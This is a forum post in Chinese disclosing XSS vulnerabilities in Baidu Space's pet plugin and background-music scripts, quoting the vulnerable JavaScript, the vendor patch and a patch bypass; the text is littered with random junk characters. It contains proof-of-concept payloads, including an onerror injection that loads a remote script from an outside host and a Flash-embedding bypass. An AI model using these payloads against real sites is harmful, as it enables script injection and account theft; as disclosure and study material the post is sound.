百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.
: Z9 K' o( D7 _. O0 c, |; X4 t. U
1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存.
) `/ F) m* d ]+ `2.在http://hi.baidu.com/ui/scripts/pet/pet.js中
`; y, \; O6 J& M0 R
6 j( ?% @+ j R8 @ f% l, s; V将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p>
+ j7 ?6 {; W0 v其中BdUtil.insertWBR为
9 H4 K! T+ A9 g" c9 O9 q9 \3 K! efunction(text, step) { ( b0 A) x/ x' Z2 t4 D
var textarea = textAreaCache || getContainer();
! U0 W7 I. C; r$ `' l6 l if (!textarea) { 1 w- s! j. z/ t. t+ L* r
return text; k" V. U6 r' S. P% [
} 5 R& F: D! \: A8 p/ o& J- g! F
textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">"); 0 n" g" J5 m) @, v
var string = textarea.value; + z9 |( G5 Z1 S$ h* X% L
var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");
9 u1 N& a" y. }- V: W U$ | var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;");
, G$ M$ u6 e! y( C1 h% C return result; / d/ t% T+ N2 J" [7 U3 z/ M
}
% }! Z1 u0 h; y9 R! z在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS. ) C% a1 Z7 h5 ]) M7 i% D+ D
测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)> ( H$ ^, X+ R0 X, @& i3 w
8 _+ @: R$ a9 H" o
二:creatbgmusic() Dom-Xss Bug
! g) D0 o6 w9 S0 q$ s: D; a9 ~百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞
& T$ V- ?+ @' G" T- y
0 a" i% d4 w: K3 k ]$ a& h; R在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码: + l' {, [2 Y9 I/ j. `
8 s1 {2 K5 E) t ]7 @function creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) { ( ?) N& E# b8 |, w% @( m4 k
//传入的murl赋值到bgmusic1和bgmusic2中
- Q9 p Z; k( r) E( d/ j/ g, n* J //可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1 3 f/ }* {1 J4 ~4 _
var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">"; 7 y Y9 K' s" E% D
if (musicnum <= 1) {
# G9 v: B. @6 U0 g* ^$ { bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">";
7 N: D! w7 b. ~' J1 D } , E! ?% }& L, Y
bgmusic1 += "</OBJECT>";
2 S5 K2 {$ k- ?! `6 B9 W var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\""; - X' {! l- h) a) K \* y( d
if (musicnum <= 1) { * [: r4 @, u( @3 ?0 _+ n
bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" ";
8 F9 F; c- E& {" T! J& h; p } 7 Z- I7 _5 d0 ]6 I3 y8 \
bgmusic2 += "> </EMBED>";
' ?* d3 }. a8 d6 @ S$ E# u var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>"; f, Y6 b3 o! a& ]! \
var bgmus = detectWMP();
0 w3 K) C; ~" P1 c* v if (functype == "FckMusicHelper") {
! r) l ^' j9 l if (bgmus.installed) { 4 R3 }) `/ ]$ V4 A( ^
if (bgmus.type == "IE") { 9 @; d1 @% M( W" M* G& |
return bgmusic1;
6 G2 ?# N$ l+ j& _! x ]+ l } else if (bgmus.type == "NS") {
. g" p. C) N- j, R6 F# r return bgmusic2; ' o9 t- ~" ?! r9 Y" u
} " E0 P+ V* W) |% Y$ D8 M
} else {
5 v4 q. V$ |3 y9 q( R7 g% N& R return bgmusic3;
0 k7 T) q- \% E) f } 8 N$ B3 W& N4 A( r6 F8 ~* X1 c
} else {
5 M( D2 ]6 v# J; H7 O+ ~0 q if (bgmus.installed) { . f- p: S( e; K4 i
//document.write 直接输出bgmusic变量 导致xss
) r- |; a/ w0 e6 O; ^1 ? if (bgmus.type == "IE") {
/ k; A( z( b' m! Q1 G4 c. \/ L$ B document.write(bgmusic1); 9 l7 ]) r/ e& g L$ j; `2 l
} else if (bgmus.type == "NS") {
$ _+ @: l+ Y0 _- D document.write(bgmusic2); T$ ?' T8 L) T% Q, J
}
! b$ r8 Y/ a" {' X) |- Z } else { 7 i( ~6 P4 l* m! h& U
document.write(bgmusic3);
9 I$ `# u" h. [& J6 A } - J6 x1 g$ v* A/ U
return "";
+ A) Z6 Y* p) q3 h2 ~ @3 P& R0 C } # S% a5 B) K- G3 |- s P
} ) z9 `* w5 K, _+ Z
6 I# m: i/ Z1 Z
在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下: 4 V0 T3 S" t2 s8 T
6 |3 {, ]# S5 v& `* l
function initBlogTextForFCK(){
) g' ^& d8 u5 p: c% U//fck init music
0 }+ s4 [8 A5 Q9 z6 O' ^if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}}
- [& m( w9 o( V* f, }0 N" b+ E. N* cvar imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组 ( s- ?) ^) T3 v
var isAutoPlay=true;
) J1 x) D$ D$ ]" Y# K7 K3 v, L( Gfor(var i=0,n=imgBox.length;i<n;i++){ //然后遍历.
- M7 N% \" m! ]" y. Y var img=imgBox; * X( v& [# Z! W8 n; s( y
if(img.getAttribute(’rel’)){
$ c) y ]+ Y! b! F- r var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc
: K* _; ]+ `- G1 r; ?, \ var musicDiv = document.createElement("SPAN"); ' N: }, U( d1 ?* g/ G- l
var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp]
9 r* L" X1 b0 X, d N
& E# o: p; q% C- j5 \. l. S .......................... # \' r: `1 \4 ~. ~
! n' U" {/ A0 O9 \ //直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来.
( a; b" _3 z }* p6 V. \ var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); # V6 n* Q6 x: ~) @0 d/ f' R0 P
shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv); ; i( @1 o2 b) L2 c6 {) e! p" S
musicDiv.innerHTML=shtml; 5 @! O# T3 j: X$ V
i--;n--;
$ ^8 U8 W% p- f }
+ W( m4 E8 K! V6 e( \}
{6 T0 q% i9 d; M4 Q' Y2 h$ |# P5 d4 }% o5 ~
从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS. 3 B" t8 |3 Q# n
2 @+ S! y! [8 j4 j测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/>
2 X b& h( T" w2 L' o2 H+ D" j$ d$ ~
等待官方补丁 7 `3 S) t W( u/ P8 D
- |/ g" D0 A* p0 S4 ~1 y7 w7 W9 w% K
update 2010年5月13日
* n! S) H, G" c+ \- K& s4 k' K0 I( S& |/ q5 }- N4 J# g2 l* a
官方补丁: . Y# @5 ^" G$ o6 M
! }: _) Q) S8 c0 h! Y! fvar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
' O( I: G4 _* @+ T+ @改为: 8 \9 s! I1 w# C" I" H4 s
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’); 3 Q: _4 ]+ d- O7 C
& T6 a$ ^ @ H4 w2 I3 [% F7 L& R3 c
update 2010年5月13日 21:50:37 $ z+ }- v/ n. E8 R3 S( E
$ g9 U+ h9 m2 ^0 s补丁存在漏洞 没有过滤" 可以继续跨: 6 ^' q; Q" P2 v9 t' O
- M! w9 f% r, |6 @8 K, o
NEW POC: , G$ ]" V' ?/ Y' R+ T
" a# G4 ~( E1 Q6 ?* `% A
<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf" % k" s3 M [$ C8 J# ?4 T2 o
Q/ R: h0 S. G8 }% q! `
allowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>1 k0 O% i: T" ?' P
8 v, t0 g \ x! s. p7 t9 ` |
发表于 2013-8-24 11:51:11
收藏
支持
反对